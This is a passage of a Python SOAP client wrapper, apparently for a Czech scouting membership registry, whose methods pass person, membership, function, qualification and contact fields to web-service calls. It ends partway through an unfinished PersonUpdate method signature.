def RequestInsert(self, ID_Login, ID, ID_Person, Birthday, ValidFrom, ID_UserCreate, ID_PersonCreate, DateCreate, ID_Unit, ID_UserDecision, ID_PersonDecision, DateDecision, NewMembership, IdentificationCode=None, Person=None, ID_Sex=None, Sex=None, Reason=None, ID_MembershipType=None, MembershipType=None, ID_MembershipCategory=None, MembershipCategory=None, PersonCreate=None, Unit=None, RegistrationNumber=None, ID_RequestState=None, RequestState=None, PersonDecision=None, Decision=None):
return self._client.service.RequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "ValidFrom": ValidFrom, "ID_UserCreate": ID_UserCreate, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_PersonDecision": ID_PersonDecision, "DateDecision": DateDecision, "NewMembership": NewMembership, "IdentificationCode": IdentificationCode, "Person": Person, "ID_Sex": ID_Sex, "Sex": Sex, "Reason": Reason, "ID_MembershipType": ID_MembershipType, "MembershipType": MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "PersonCreate": PersonCreate, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_RequestState": ID_RequestState, "RequestState": RequestState, "PersonDecision": PersonDecision, "Decision": Decision})
# Načíst seznam stavů žadosti o převod
def RequestStateAll(self, ID_Login, DisplayName=None):
return self._client.service.RequestStateAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit žádost o převod
def RequestUpdate(self, ID_Login, ID, ID_Person, Birthday, ValidFrom, ID_UserCreate, ID_PersonCreate, DateCreate, ID_Unit, ID_UserDecision, ID_PersonDecision, DateDecision, NewMembership, IdentificationCode=None, Person=None, ID_Sex=None, Sex=None, Reason=None, ID_MembershipType=None, MembershipType=None, ID_MembershipCategory=None, MembershipCategory=None, PersonCreate=None, Unit=None, RegistrationNumber=None, ID_RequestState=None, RequestState=None, PersonDecision=None, Decision=None):
return self._client.service.RequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "ValidFrom": ValidFrom, "ID_UserCreate": ID_UserCreate, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_PersonDecision": ID_PersonDecision, "DateDecision": DateDecision, "NewMembership": NewMembership, "IdentificationCode": IdentificationCode, "Person": Person, "ID_Sex": ID_Sex, "Sex": Sex, "Reason": Reason, "ID_MembershipType": ID_MembershipType, "MembershipType": MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "PersonCreate": PersonCreate, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_RequestState": ID_RequestState, "RequestState": RequestState, "PersonDecision": PersonDecision, "Decision": Decision})
# Přehled registračních komentářů
def UnitRegistrationReport(self, ID_Login, ID):
return self._client.service.UnitRegistrationReport({"ID_Login": ID_Login, "ID": ID})
# Detailní informace o osobách v jednotce (pro export do CSV)
def PersonAllExport(self, ID_Login, ID_Unit):
return self._client.service.PersonAllExport({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Načíst seznam registrací podřízených jednotek
def UnitRegistrationAllChild(self, ID_Login, ID_UnitRegistration):
return self._client.service.UnitRegistrationAllChild({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration})
# Upravit historickou funkci
def FunctionUpdateHistory(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionUpdateHistory({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Založit historickou funkci
def FunctionInsertHistory(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionInsertHistory({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Smazat historickou funkci
def FunctionDeleteHistory(self, ID_Login, ID):
return self._client.service.FunctionDeleteHistory({"ID_Login": ID_Login, "ID": ID})
# Smazat historickou kvalifikaci
def QualificationDeleteHistory(self, ID_Login, ID):
return self._client.service.QualificationDeleteHistory({"ID_Login": ID_Login, "ID": ID})
# Založit historickou kvalifikaci
def QualificationInsertHistory(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
return self._client.service.QualificationInsertHistory({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
# Upravit historickou kvalifikaci
def QualificationUpdateHistory(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
return self._client.service.QualificationUpdateHistory({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
# Přehled odvodů pro nadřízené jednotky
def UnitRegistrationSummary(self, ID_Login, ID):
return self._client.service.UnitRegistrationSummary({"ID_Login": ID_Login, "ID": ID})
# Hledání osob
def PersonAllLogin(self, ID_Login, Birthday, FirstName=None, LastName=None, NickName=None, IdentificationCode=None, IdentificationCodeStartsWith=None, ID_MembershipType=None, ID_MembershipCategory=None, Phone=None, Email=None, City=None, RegistrationNumber=None):
return self._client.service.PersonAllLogin({"ID_Login": ID_Login, "Birthday": Birthday, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "Phone": Phone, "Email": Email, "City": City, "RegistrationNumber": RegistrationNumber})
# Načtení informací o osobě podle bezpečnostního kódu a uživatelského jména
def PersonDetailSecurityCode(self, ID_Login, UserName=None, SecurityCode=None):
return self._client.service.PersonDetailSecurityCode({"ID_Login": ID_Login, "UserName": UserName, "SecurityCode": SecurityCode})
# Ověření platnosti rodného čísla
def PersonParseIdentificationCode(self, ID_Login, IdentificationCode=None):
return self._client.service.PersonParseIdentificationCode({"ID_Login": ID_Login, "IdentificationCode": IdentificationCode})
# Načíst seznam registrací osoby
def PersonRegistrationAllPerson(self, ID_Login, ID_Person, Year, IsLastRegistration, Unit=None):
return self._client.service.PersonRegistrationAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "Year": Year, "IsLastRegistration": IsLastRegistration, "Unit": Unit})
# Načíst seznam funkcí osoby
def FunctionAllPerson(self, ID_Login, ID_Person, ID_Unit, ID_FunctionType, ShowHistory, IsOficial, IsValid, ID_FunctionReason=None):
return self._client.service.FunctionAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ShowHistory": ShowHistory, "IsOficial": IsOficial, "IsValid": IsValid, "ID_FunctionReason": ID_FunctionReason})
# Načíst seznam členství osob v jednotce
def MembershipAllPerson(self, ID_Login, ID_Person, ID_Unit, ShowHistory, IsValid, ID_MembershipType=None, ID_MembershipCategory=None):
return self._client.service.MembershipAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ShowHistory": ShowHistory, "IsValid": IsValid, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory})
# Vrátí seznam uživatelů, kteří nejsou zaregistrovaní v registraci jednotky odpovídající zadané kategorii
def PersonAllRegistrationCategory(self, ID_Login, ID_RegistrationCategory, ID, IncludeChild):
return self._client.service.PersonAllRegistrationCategory({"ID_Login": ID_Login, "ID_RegistrationCategory": ID_RegistrationCategory, "ID": ID, "IncludeChild": IncludeChild})
# Smazat registrační vadu osoby
def PersonMistakeReportDelete(self, ID_Login, ID):
return self._client.service.PersonMistakeReportDelete({"ID_Login": ID_Login, "ID": ID})
# Založit registrační vadu osoby
def PersonMistakeReportInsert(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.PersonMistakeReportInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_UnitRegistration": ID_UnitRegistration, "ID_Mistake": ID_Mistake, "Person": Person, "UnitRegistrationNumber": UnitRegistrationNumber, "Unit": Unit, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Načíst seznam registrací osob v jednotce
def PersonRegistrationAll(self, ID_Login, ID_UnitRegistration, IncludeChild):
return self._client.service.PersonRegistrationAll({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "IncludeChild": IncludeChild})
# Smazat registraci osoby
def PersonRegistrationDelete(self, ID_Login, ID, ID_UnitRegistration, ID_Items=None):
return self._client.service.PersonRegistrationDelete({"ID_Login": ID_Login, "ID": ID, "ID_UnitRegistration": ID_UnitRegistration, "ID_Items": ID_Items})
# Založit registraci osoby
def PersonRegistrationInsert(self, ID_Login, ID_Membership, ID_RegistrationCategory, ID_RegistrationServiceArray=None):
return self._client.service.PersonRegistrationInsert({"ID_Login": ID_Login, "ID_Membership": ID_Membership, "ID_RegistrationCategory": ID_RegistrationCategory, "ID_RegistrationServiceArray": ID_RegistrationServiceArray})
# Založit registraci jednotky
def RegistrationCategoryCopyFromParentUnit(self, ID_Login, ID_UnitRegistrationCopy):
return self._client.service.RegistrationCategoryCopyFromParentUnit({"ID_Login": ID_Login, "ID_UnitRegistrationCopy": ID_UnitRegistrationCopy})
# Načíst seznam titulů osoby
def DegreeAll(self, ID_Login, ID_Person, ID_DegreeType):
return self._client.service.DegreeAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_DegreeType": ID_DegreeType})
# Smazat titul osoby
def DegreeDelete(self, ID_Login, ID):
return self._client.service.DegreeDelete({"ID_Login": ID_Login, "ID": ID})
# Založit titul osoby
def DegreeInsert(self, ID_Login, ID_Person, ID, ID_DegreeType):
return self._client.service.DegreeInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_DegreeType": ID_DegreeType})
# Načíst seznam titulů
def DegreeTypeAll(self, ID_Login, ID_Application, ID, DisplayName=None):
return self._client.service.DegreeTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Upravit titul osoby
def DegreeUpdate(self, ID_Login, ID_Person, ID, ID_DegreeType):
return self._client.service.DegreeUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_DegreeType": ID_DegreeType})
# Načíst seznam vzdělání osoby
def EducationAll(self, ID_Login, ID_Person, ID_EducationType):
return self._client.service.EducationAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_EducationType": ID_EducationType})
# Smazat vzdělání osoby
def EducationDelete(self, ID_Login, ID):
return self._client.service.EducationDelete({"ID_Login": ID_Login, "ID": ID})
# Založit vzdělání osoby
def EducationInsert(self, ID_Login, ID_Person, ID, ID_EducationType, Note=None):
return self._client.service.EducationInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_EducationType": ID_EducationType, "Note": Note})
# Načíst seznam typů vzdělání
def EducationTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.EducationTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit vzdělání osoby
def EducationUpdate(self, ID_Login, ID_Person, ID, ID_EducationType, Note=None):
return self._client.service.EducationUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_EducationType": ID_EducationType, "Note": Note})
# Načíst seznam funkcí v jednotce
def FunctionAll(self, ID_Login, ID_Person, ID_Unit, ID_FunctionType, IsValid, ShowHistory, IsAgency, ID_Agency, IsStatutory, ID_FunctionReason=None, Person=None):
return self._client.service.FunctionAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "IsValid": IsValid, "ShowHistory": ShowHistory, "IsAgency": IsAgency, "ID_Agency": ID_Agency, "IsStatutory": IsStatutory, "ID_FunctionReason": ID_FunctionReason, "Person": Person})
# Načíst detail funkce
def FunctionDetail(self, ID_Login, ID):
return self._client.service.FunctionDetail({"ID_Login": ID_Login, "ID": ID})
# Založit funkci
def FunctionInsert(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionInsert({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Načíst seznam důvodů ukončení funkce
def FunctionReasonAll(self, ID_Login, DisplayName=None):
return self._client.service.FunctionReasonAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Načíst seznam typů funkcí
def FunctionTypeAll(self, ID_Login, ID_Role, IsElective, DisplayName=None, ID_UnitType=None):
return self._client.service.FunctionTypeAll({"ID_Login": ID_Login, "ID_Role": ID_Role, "IsElective": IsElective, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType})
# Smazat typ funkce
def FunctionTypeDelete(self, ID_Login, ID):
return self._client.service.FunctionTypeDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail typu funkce
def FunctionTypeDetail(self, ID_Login, ID):
return self._client.service.FunctionTypeDetail({"ID_Login": ID_Login, "ID": ID})
# Založit typ funkce
def FunctionTypeInsert(self, ID_Login, ID, ID_Role, MinCount, MaxCount, IsStatutory, IsAssistant, IsAudit, IsOficial, IsElective, IsNotCongress, IsSpecification, ID_Agency, Order, DisplayName=None, Code=None, ID_UnitType=None, Note=None, Agency=None):
return self._client.service.FunctionTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_Role": ID_Role, "MinCount": MinCount, "MaxCount": MaxCount, "IsStatutory": IsStatutory, "IsAssistant": IsAssistant, "IsAudit": IsAudit, "IsOficial": IsOficial, "IsElective": IsElective, "IsNotCongress": IsNotCongress, "IsSpecification": IsSpecification, "ID_Agency": ID_Agency, "Order": Order, "DisplayName": DisplayName, "Code": Code, "ID_UnitType": ID_UnitType, "Note": Note, "Agency": Agency})
# Upravit typ funkce
def FunctionTypeUpdate(self, ID_Login, ID, ID_Role, MinCount, MaxCount, IsStatutory, IsAssistant, IsAudit, IsOficial, IsElective, IsNotCongress, IsSpecification, ID_Agency, Order, DisplayName=None, Code=None, ID_UnitType=None, Note=None, Agency=None):
return self._client.service.FunctionTypeUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Role": ID_Role, "MinCount": MinCount, "MaxCount": MaxCount, "IsStatutory": IsStatutory, "IsAssistant": IsAssistant, "IsAudit": IsAudit, "IsOficial": IsOficial, "IsElective": IsElective, "IsNotCongress": IsNotCongress, "IsSpecification": IsSpecification, "ID_Agency": ID_Agency, "Order": Order, "DisplayName": DisplayName, "Code": Code, "ID_UnitType": ID_UnitType, "Note": Note, "Agency": Agency})
# Upravit funkci
def FunctionUpdate(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionUpdate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Načíst seznam členství osob v jednotce k aktualizaci
def MembershipAllUnitUpdate(self, ID_Login, ID_Unit, OnlyDirectMember, LastValidOnly):
return self._client.service.MembershipAllUnitUpdate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "OnlyDirectMember": OnlyDirectMember, "LastValidOnly": LastValidOnly})
# Načíst seznam výchovných kategorií
def MembershipCategoryAll(self, ID_Login, Age, ID_Unit, ID=None, DisplayName=None, ID_Sex=None):
return self._client.service.MembershipCategoryAll({"ID_Login": ID_Login, "Age": Age, "ID_Unit": ID_Unit, "ID": ID, "DisplayName": DisplayName, "ID_Sex": ID_Sex})
# Načíst detail členství osoby v jednotce
def MembershipDetail(self, ID_Login, ID):
return self._client.service.MembershipDetail({"ID_Login": ID_Login, "ID": ID})
# Založit členství osoby v jednotce
def MembershipInsert(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
return self._client.service.MembershipInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
# Načíst seznam důvodů změny/ukončení členství
def MembershipReasonAll(self, ID_Login, IsMulti, ID=None, DisplayName=None):
return self._client.service.MembershipReasonAll({"ID_Login": ID_Login, "IsMulti": IsMulti, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam typů členství
def MembershipTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.MembershipTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit členství osoby v jednotce
def MembershipUpdate(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
return self._client.service.MembershipUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
# Načíst seznam užívání nemovitosti
def OccupationAll(self, ID_Login, ID_Application, ID_Unit, IncludeChildUnits, ID_Realty, Publish, ID_RealtyType, Distance, GpsLatitude, GpsLongitude, GpsLatitudeStart, GpsLongitudeStart, GpsLatitudeEnd, GpsLongitudeEnd, AdvertisingCategories=None):
return self._client.service.OccupationAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "ID_Realty": ID_Realty, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "Distance": Distance, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "GpsLatitudeStart": GpsLatitudeStart, "GpsLongitudeStart": GpsLongitudeStart, "GpsLatitudeEnd": GpsLatitudeEnd, "GpsLongitudeEnd": GpsLongitudeEnd, "AdvertisingCategories": AdvertisingCategories})
# Smazat užívání nemovitosti
def OccupationDelete(self, ID_Login, ID):
return self._client.service.OccupationDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail užívání nemovitosti
def OccupationDetail(self, ID_Login, ID):
return self._client.service.OccupationDetail({"ID_Login": ID_Login, "ID": ID})
# Založit užívání nemovitosti
def OccupationInsert(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
return self._client.service.OccupationInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Realty": ID_Realty, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "Note": Note, "RealtyType": RealtyType})
# Upravit užívání nemovitosti
def OccupationUpdate(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
return self._client.service.OccupationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Realty": ID_Realty, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "Note": Note, "RealtyType": RealtyType})
# Načíst seznam nabídky činnosti
def OfferAll(self, ID_Login, ID_Person, ID_OfferType, ShowHistory):
return self._client.service.OfferAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_OfferType": ID_OfferType, "ShowHistory": ShowHistory})
# Smazat nabídku činnosti
def OfferDelete(self, ID_Login, ID):
return self._client.service.OfferDelete({"ID_Login": ID_Login, "ID": ID})
# Založit nabídku činnosti
def OfferInsert(self, ID_Login, ID_Person, ID, ID_OfferType, Note=None):
return self._client.service.OfferInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_OfferType": ID_OfferType, "Note": Note})
# Načíst seznam činností
def OfferTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.OfferTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Upravit nabídku činnosti
def OfferUpdate(self, ID_Login, ID_Person, ID, ID_OfferType, Note=None):
return self._client.service.OfferUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_OfferType": ID_OfferType, "Note": Note})
# Načíst seznam osob
def PersonAll(self, ID_Login, ID, ID_Unit, OnlyDirectMember, ID_FunctionType, ID_QualificationType, DisplayName=None, ID_Sex=None, IdentificationCode=None, FirstName=None, LastName=None, SecurityCode=None, IdentificationCodeStartsWith=None, RegistrationNumber=None):
return self._client.service.PersonAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "OnlyDirectMember": OnlyDirectMember, "ID_FunctionType": ID_FunctionType, "ID_QualificationType": ID_QualificationType, "DisplayName": DisplayName, "ID_Sex": ID_Sex, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "SecurityCode": SecurityCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith, "RegistrationNumber": RegistrationNumber})
# Načíst seznam kontaktů osoby
def PersonContactAll(self, ID_Login, ID_Person, IsCatalog, IsMain, IsHidden, ID_ContactType=None):
return self._client.service.PersonContactAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "IsCatalog": IsCatalog, "IsMain": IsMain, "IsHidden": IsHidden, "ID_ContactType": ID_ContactType})
# Smazat kontakt osoby
def PersonContactDelete(self, ID_Login, ID):
return self._client.service.PersonContactDelete({"ID_Login": ID_Login, "ID": ID})
# Založit kontakt osoby
def PersonContactInsert(self, ID_Login, ID_Person, ID, IsGa, IsCatalog, IsHidden, ID_ContactType=None, Value=None, Note=None):
return self._client.service.PersonContactInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsGa": IsGa, "IsCatalog": IsCatalog, "IsHidden": IsHidden, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Upravit kontakt osoby
def PersonContactUpdate(self, ID_Login, ID_Person, ID, IsGa, IsCatalog, IsHidden, ID_ContactType=None, Value=None, Note=None):
return self._client.service.PersonContactUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsGa": IsGa, "IsCatalog": IsCatalog, "IsHidden": IsHidden, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
# Založení osoby
def PersonInsert(self, ID_Login, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, IdentificationCodeForce, ID_UnitEnrollTempFile, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
return self._client.service.PersonInsert({"ID_Login": ID_Login, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "IdentificationCodeForce": IdentificationCodeForce, "ID_UnitEnrollTempFile": ID_UnitEnrollTempFile, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Editace osoby
def PersonUpdate(self, ID_Login, ID, Birthday, BirthdayYear, IsForeign, YearFrom, ID_User, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, RejectDataStorage, IdentificationCodeForce, GenerateSecurityCode, ID_TempFile, ID_PersonPhotoBig, ID_PersonPhotoMedium, ID_PersonPhotoNormal, ID_PersonPhotoSmall, IdentificationCode=None, FirstName=None, LastName=None, NickName=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, ID_Sex=None, RegistrationNumber=None, PhotoExtension=None, PhotoContent=None, MaidenName=None, AddressDistrict=None, PostalDistrict=None, UnitEnrollExtension=None, UnitEnroll=None):
